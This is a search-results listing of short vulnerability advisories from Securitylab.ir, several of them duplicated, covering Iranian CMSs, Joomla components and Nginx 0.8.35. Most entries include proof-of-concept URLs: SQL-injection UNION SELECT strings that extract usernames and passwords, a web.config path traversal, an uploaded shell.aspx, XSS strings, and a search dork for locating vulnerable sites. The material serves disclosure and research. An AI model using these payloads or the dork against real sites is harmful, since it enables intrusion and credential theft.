243 matches found
Pars Design CMS - Arbitrary File Upload
Pars Design CMS - Arbitrary File Upload Securitylab.ir Application Info: Name: Pars Design Vendor: http://Parsdata.com Vulnerability Info: Type: Remote Arbitrary File Upload Risk: High Vulnerability: http://site.ir/editorv2/editor/filemanager/upload/test.html Uploaded Here:...
Pars Design CMS - Arbitrary File Upload
Securitylab.ir Application Info: Name: Pars Design Vendor: http://Parsdata.com Vulnerability Info: Type: Remote Arbitrary File Upload Risk: High Vulnerability: http://site.ir/editorv2/editor/filemanager/upload/test.html Uploaded Here: http://site.ir//UserFiles/shell.aspx Discoverd By:...
Nginx 0.8.35 Space Character Remote Source Disclosure
Securitylab.ir Application Info: Name: Nginx Tested on nginx 0.8.35 Nginx 0.8.36 and higher is not vulnerable Vulnerability Info: Type: Remote File Disclosure Risk: High Vulnerability: http://localhost/file.php20 Discoverd By: Pouya Daneshmand Website: http://Pouya.Securitylab.ir Contacts:...
Nginx 0.8.35 Space Character Remote Source Disclosure
No description provided by source. Securitylab.ir Application Info: Name: Nginx Tested on nginx 0.8.35 Nginx 0.8.36 and higher is not vulnerable Vulnerability Info: Type: Remote File Disclosure Risk: High Vulnerability: http://localhost/file.php%20 Discoverd By: Pouya Daneshmand Website:...
Nginx 0.8.35 Source Code Disclosure
Securitylab.ir Application Info: Name: Nginx Tested on nginx 0.8.35 Nginx 0.8.36 and higher is not vulnerable Vulnerability Info: Type: Remote File Disclosure Risk: High Vulnerability: http://localhost/file.php%20 Discoverd By: Pouya Daneshmand Website: http://Pouya.Securitylab.ir Contacts:...
Smart Douran CMS Remote File Download
Securitylab.ir Application Info: Name: Smart Douran CMS Vendor: http://smartdouran.ir Vulnerability Info: Type: Remote File Download Risk: Medium 2008-08-11 - Found Vulnerability 2010-05-19 - Public disclosure Vulnerability: http://site.com/Admin/ImportExport/Download.aspx?filename=../../web.conf...
Unfixed XSS vulnerability at tusca.ut.ac.ir
Security researcher Securitylab.ir, has submitted on 05/12/2010 a cross-site-scripting XSS vulnerability affecting tusca.ut.ac.ir, which at the time of submission ranked 8983 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 21/12/2011. It is...
Tadbir CMS Shell Upload
Securitylab.ir Application Info: Name: Tadbir CMS Vendor: http://etadbir.com Vulnerability Info: Type: Remote Arbitrary File Upload Risk: High 2010-01-12 - Found Vulnerability 2010-04-22 - Vendor notified 2010-05-08 - Public disclosure Vulnerability:...
Pargoon Denial Of Service
Securitylab.ir Application Info: Name: Pargoon Vendor: http://www.vestasoft.ir Vulnerability Info: Type: DOS Risk: Medium 2010-01-17 - Found Vulnerability 2010-01-19 - Vendor notified 2010-05-08 - Public disclosure Vulnerability:...
Pargoon CMS - Denial of Service
Pargoon CMS - Denial of Service Securitylab.ir Application Info: Name: Pargoon Vendor: http://www.vestasoft.ir Vulnerability Info: Type: DOS Risk: Medium 2010-01-17 - Found Vulnerability 2010-01-19 - Vendor notified 2010-05-08 - Public disclosure Vulnerability:...
Pargoon CMS - Denial of Service
Securitylab.ir Application Info: Name: Pargoon Vendor: http://www.vestasoft.ir Vulnerability Info: Type: DOS Risk: Medium 2010-01-17 - Found Vulnerability 2010-01-19 - Vendor notified 2010-05-08 - Public disclosure Vulnerability:...
MojeNoo Shell Upload
Securitylab.ir Application Info: Name: MojeNoo Vendor: http://www.mojenoo.com Vulnerability Info: Type: Remote Arbitrary File Upload Risk: High 2009-11-04 - Found Vulnerability 2010-05-03 - Vendor notified 2010-05-08 - Public disclosure Vulnerability: http://www.mojenoo.com/Webgenerator/Signup.as...
Espinas CMS SQL Injection
Securitylab.ir Application Info: Name: Espinas CMS Vendor: http://espinas.ir Vulnerability Info: Type: Sql Injection Risk: Medium Dork: "Powered by Espinas IT" Vulnerability: http://site.ir/news.asp?id=-1+union+select+1,concatusername,0x3a,0x3a,password,3,4,5+from+sinabedusers Discoverd By: Pouya...
Espinas CMS - SQL Injection
Espinas CMS - SQL Injection Securitylab.ir Application Info: Name: Espinas CMS Vendor: http://espinas.ir Vulnerability Info: Type: Sql Injection Risk: Medium Dork: "Powered by Espinas IT" Vulnerability:...
Espinas CMS - SQL Injection
Securitylab.ir Application Info: Name: Espinas CMS Vendor: http://espinas.ir Vulnerability Info: Type: Sql Injection Risk: Medium Dork: "Powered by Espinas IT" Vulnerability: http://site.ir/news.asp?id=-1+union+select+1,concatusername,0x3a,0x3a,password,3,4,5+from+sinabedusers...
Joomla Component com_xmap Sql Injection Vulnerability
Securitylab.ir Application Info: Name: Joomla Component comxmap Vulnerability Info: Type: Sql Injection Risk: Medium Vulnerability: http://site.com/index.php?option=comxmap&sitemap=2&Itemid=18-1 UNION SELECT 1,2,3,version,5,6,7,8-- Discoverd By: Pouya Daneshmand Website: http://Pouya.securitylab....
Joomla Component com_weblinks Sql Injection Vulnerability
Securitylab.ir Application Info: Name: Joomla Component comweblinks Vulnerability Info: Type: Sql Injection Risk: Medium Vulnerability: http://site.com/index.php?option=comweblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5 Discoverd By: Pouya Daneshmand Website: http://Pouya.securitylab.ir...
XSS vulnerability in easy page cms
Securitylab.ir Application Info: Name: Easy Page Vendor: http://easypage.org Vulnerability Info: Type: XSS Risk: low Vulnerability: http://site.ir/default.aspx?page=Document&app=Documents&docId=1&docParId=script"xss"/script Discoverd By: Pouya Daneshmand Website: http://Pouya.Securitylab.ir...
Joomla Xmap SQL Injection
Securitylab.ir Application Info: Name: Joomla Component comxmap Vulnerability Info: Type: Sql Injection Risk: Medium Vulnerability: http://site.com/index.php?option=comxmap&sitemap=2&Itemid=18-1 UNION SELECT 1,2,3,version,5,6,7,8-- Discoverd By: Pouya Daneshmand Website: http://Pouya.securitylab....
Easy Page Cross Site Scripting
Securitylab.ir Application Info: Name: Easy Page Vendor: http://easypage.org Vulnerability Info: Type: XSS Risk: low Vulnerability: http://site.ir/default.aspx?page=Document&app=Documents&docId=1&docParId="xss" Discoverd By: Pouya Daneshmand Website: http://Pouya.Securitylab.ir Contacts:...